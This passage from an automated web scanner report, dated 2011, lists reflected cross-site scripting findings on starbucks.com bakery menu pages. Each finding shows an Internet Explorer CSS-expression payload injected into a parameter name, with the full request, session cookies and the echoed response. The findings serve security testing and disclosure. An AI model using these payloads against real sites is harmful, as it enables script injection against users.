GET /menu/food/bakery/apple-bran-muffin?b49f2"style%3d"x%3aexpression(alert(1))"d39bf9c38f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:38 GMT
Connection: close
Content-Length: 44399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/apple-bran-muffin?b49f2"style="x:expression(alert(1))"d39bf9c38f=1"/>
...[SNIP]...

2.208. http://www.starbucks.com/menu/food/bakery/apple-fritter [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-fritter

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31dd9"style%3d"x%3aexpression(alert(1))"86ccc93fdb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31dd9"style="x:expression(alert(1))"86ccc93fdb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/apple-fritter?31dd9"style%3d"x%3aexpression(alert(1))"86ccc93fdb0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:02 GMT
Connection: close
Content-Length: 44539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/apple-fritter?31dd9"style="x:expression(alert(1))"86ccc93fdb0=1"/>
...[SNIP]...

2.209. http://www.starbucks.com/menu/food/bakery/asiago-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/asiago-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2958"style%3d"x%3aexpression(alert(1))"253fd2ac0e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2958"style="x:expression(alert(1))"253fd2ac0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/asiago-bagel?e2958"style%3d"x%3aexpression(alert(1))"253fd2ac0e8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:43 GMT
Connection: close
Content-Length: 44137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/asiago-bagel?e2958"style="x:expression(alert(1))"253fd2ac0e8=1"/>
...[SNIP]...

2.210. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/banana-nut-loaf

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 608e6"style%3d"x%3aexpression(alert(1))"50409be2fad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 608e6"style="x:expression(alert(1))"50409be2fad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/banana-nut-loaf?608e6"style%3d"x%3aexpression(alert(1))"50409be2fad=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:13 GMT
Connection: close
Content-Length: 42886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/banana-nut-loaf?608e6"style="x:expression(alert(1))"50409be2fad=1"/>
...[SNIP]...

2.211. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/birthday-cake-mini-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b15"style%3d"x%3aexpression(alert(1))"625aeb76d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36b15"style="x:expression(alert(1))"625aeb76d3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/birthday-cake-mini-doughnut?36b15"style%3d"x%3aexpression(alert(1))"625aeb76d3a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:32 GMT
Connection: close
Content-Length: 43794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut?36b15"style="x:expression(alert(1))"625aeb76d3a=1"/>
...[SNIP]...

2.212. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-oat-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d769"style%3d"x%3aexpression(alert(1))"3750d0b57de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d769"style="x:expression(alert(1))"3750d0b57de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/blueberry-oat-bar?8d769"style%3d"x%3aexpression(alert(1))"3750d0b57de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:08 GMT
Connection: close
Content-Length: 43568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar?8d769"style="x:expression(alert(1))"3750d0b57de=1"/>
...[SNIP]...

2.213. http://www.starbucks.com/menu/food/bakery/blueberry-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7708"style%3d"x%3aexpression(alert(1))"023b71db86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7708"style="x:expression(alert(1))"023b71db86f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/blueberry-scone?d7708"style%3d"x%3aexpression(alert(1))"023b71db86f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:53 GMT
Connection: close
Content-Length: 43585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-scone?d7708"style="x:expression(alert(1))"023b71db86f=1"/>
...[SNIP]...

2.214. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-streusel-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4f8c"style%3d"x%3aexpression(alert(1))"3533e46b66c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4f8c"style="x:expression(alert(1))"3533e46b66c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/blueberry-streusel-muffin?a4f8c"style%3d"x%3aexpression(alert(1))"3533e46b66c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:03 GMT
Connection: close
Content-Length: 43829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin?a4f8c"style="x:expression(alert(1))"3533e46b66c=1"/>
...[SNIP]...

2.215. http://www.starbucks.com/menu/food/bakery/butter-croissant [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/butter-croissant

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c60"style%3d"x%3aexpression(alert(1))"78f4d5b41a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61c60"style="x:expression(alert(1))"78f4d5b41a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/butter-croissant?61c60"style%3d"x%3aexpression(alert(1))"78f4d5b41a5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:07 GMT
Connection: close
Content-Length: 43459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/butter-croissant?61c60"style="x:expression(alert(1))"78f4d5b41a5=1"/>
...[SNIP]...

2.216. http://www.starbucks.com/menu/food/bakery/cheese-danish [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cheese-danish

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 720d9"style%3d"x%3aexpression(alert(1))"e96e6a310b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 720d9"style="x:expression(alert(1))"e96e6a310b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/cheese-danish?720d9"style%3d"x%3aexpression(alert(1))"e96e6a310b9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:28 GMT
Connection: close
Content-Length: 43530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cheese-danish?720d9"style="x:expression(alert(1))"e96e6a310b9=1"/>
...[SNIP]...

2.217. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-chunk-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ae7"style%3d"x%3aexpression(alert(1))"1218e3ddc34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3ae7"style="x:expression(alert(1))"1218e3ddc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/chocolate-chunk-cookie?b3ae7"style%3d"x%3aexpression(alert(1))"1218e3ddc34=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:28 GMT
Connection: close
Content-Length: 43745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie?b3ae7"style="x:expression(alert(1))"1218e3ddc34=1"/>
...[SNIP]...

2.218. http://www.starbucks.com/menu/food/bakery/chocolate-croissant [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-croissant

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6af"style%3d"x%3aexpression(alert(1))"7f2ab7e4792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec6af"style="x:expression(alert(1))"7f2ab7e4792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/chocolate-croissant?ec6af"style%3d"x%3aexpression(alert(1))"7f2ab7e4792=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:24 GMT
Connection: close
Content-Length: 43723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-croissant?ec6af"style="x:expression(alert(1))"7f2ab7e4792=1"/>
...[SNIP]...

2.219. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-old-fashion-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e17"style%3d"x%3aexpression(alert(1))"09e01d0c9ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8e17"style="x:expression(alert(1))"09e01d0c9ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/chocolate-old-fashion-doughnut?e8e17"style%3d"x%3aexpression(alert(1))"09e01d0c9ea=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:23 GMT
Connection: close
Content-Length: 44023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut?e8e17"style="x:expression(alert(1))"09e01d0c9ea=1"/>
...[SNIP]...

2.220. http://www.starbucks.com/menu/food/bakery/chonga-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chonga-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a9de"style%3d"x%3aexpression(alert(1))"4d4ab94d51c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a9de"style="x:expression(alert(1))"4d4ab94d51c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/chonga-bagel?9a9de"style%3d"x%3aexpression(alert(1))"4d4ab94d51c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:59 GMT
Connection: close
Content-Length: 44374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chonga-bagel?9a9de"style="x:expression(alert(1))"4d4ab94d51c=1"/>
...[SNIP]...

2.221. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cinnamon-chip-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9357"style%3d"x%3aexpression(alert(1))"a5e7a229ce8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9357"style="x:expression(alert(1))"a5e7a229ce8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cinnamon-chip-scone?f9357"style%3d"x%3aexpression(alert(1))"a5e7a229ce8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
